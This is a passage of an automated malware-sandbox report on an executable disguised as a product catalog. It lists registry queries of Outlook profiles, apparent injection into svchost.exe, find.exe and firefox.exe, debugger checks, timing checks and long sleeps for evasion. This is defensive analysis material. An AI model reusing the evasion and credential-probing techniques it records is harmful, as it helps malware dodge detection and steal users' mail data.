            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Products Order Catalogs20242.exeStatic file information: File size 1323139 > 1048576
            Source: Binary string: find.pdb source: svchost.exe, 00000001.00000002.2180830146.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2180850303.0000000003019000.00000004.00000020.00020000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000002.4191425116.00000000009C7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: brfQTUZMGd.exe, 00000005.00000002.4191667960.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp, brfQTUZMGd.exe, 00000007.00000000.2258103015.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Products Order Catalogs20242.exe, 00000000.00000003.1755475115.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, Products Order Catalogs20242.exe, 00000000.00000003.1757295424.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2181015352.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2089944890.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088009018.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2181015352.000000000379E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192472622.000000000393E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000006.00000003.2181151035.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000003.2184224977.00000000035EF000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192472622.00000000037A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Products Order Catalogs20242.exe, 00000000.00000003.1755475115.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, Products Order Catalogs20242.exe, 00000000.00000003.1757295424.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2181015352.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2089944890.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088009018.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2181015352.000000000379E000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000006.00000002.4192472622.000000000393E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000006.00000003.2181151035.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000003.2184224977.00000000035EF000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192472622.00000000037A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: find.pdbGCTL source: svchost.exe, 00000001.00000002.2180830146.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2180850303.0000000003019000.00000004.00000020.00020000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000002.4191425116.00000000009C7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: find.exe, 00000006.00000002.4191342019.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192942372.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259727033.0000000002C5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001DECC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: find.exe, 00000006.00000002.4191342019.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192942372.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259727033.0000000002C5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001DECC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: Products Order Catalogs20242.exeStatic PE information: real checksum: 0xa2135 should be: 0x146097
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E083 push es; retf 1_2_0042E0A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413907 push ebp; ret 1_2_00413915
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413A79 push esp; retf 1_2_00413A7A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404ABE push esi; retf 1_2_00404ADD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E323 push eax; retf 1_2_0041E336
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004143C9 push eax; iretd 1_2_004143D2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A46D push ecx; ret 1_2_0040A483
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418C9B push ds; ret 1_2_00418C9C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CCAA push es; ret 1_2_0040CCAB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412E03 push esi; ret 1_2_00412FD4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E80 push eax; ret 1_2_00402E82
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004017D8 push ss; retf 1_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360225F pushad ; ret 1_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036027FA pushad ; ret 1_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx1_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360283D push eax; iretd 1_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360135F push eax; iretd 1_2_03601369
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032C4342 push esi; retf 5_2_032C4361
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032DDBA7 push eax; retf 5_2_032DDBBA
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032D4F3A push eax; retf 5_2_032D4F3B
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032CC52E push es; ret 5_2_032CC52F
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032D851F push ds; ret 5_2_032D8520
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032D3C50 push eax; iretd 5_2_032D3C56
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032C9CF1 push ecx; ret 5_2_032C9D07
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037A225F pushad ; ret 6_2_037A27F9
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037A27FA pushad ; ret 6_2_037A27F9
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037D09AD push ecx; mov dword ptr [esp], ecx6_2_037D09B6
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037A283D push eax; iretd 6_2_037A2858
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037A1328 push eax; iretd 6_2_037A1369
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03040BF6 push esp; retf 6_2_03040BF7
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004440780_2_00444078
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeAPI/Special instruction interceptor: Address: 40D128C
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
            Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 9713Jump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeAPI coverage: 3.2 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\find.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\find.exe TID: 7896Thread sleep count: 259 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 7896Thread sleep time: -518000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 7896Thread sleep count: 9713 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 7896Thread sleep time: -19426000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe TID: 7960Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe TID: 7960Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe TID: 7960Thread sleep time: -51000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe TID: 7960Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe TID: 7960Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0304C530 FindFirstFileW,FindNextFileW,FindClose,6_2_0304C530
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: brfQTUZMGd.exe, 00000007.00000002.4192192249.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: find.exe, 00000006.00000002.4191342019.00000000031A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000008.00000002.2484122443.000002245DE3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004172A3 LdrLoadDll,1_2_004172A3
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_040D14F8 mov eax, dword ptr fs:[00000030h]0_2_040D14F8
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_040D1558 mov eax, dword ptr fs:[00000030h]0_2_040D1558
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_040CFE78 mov eax, dword ptr fs:[00000030h]0_2_040CFE78
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]1_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]1_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
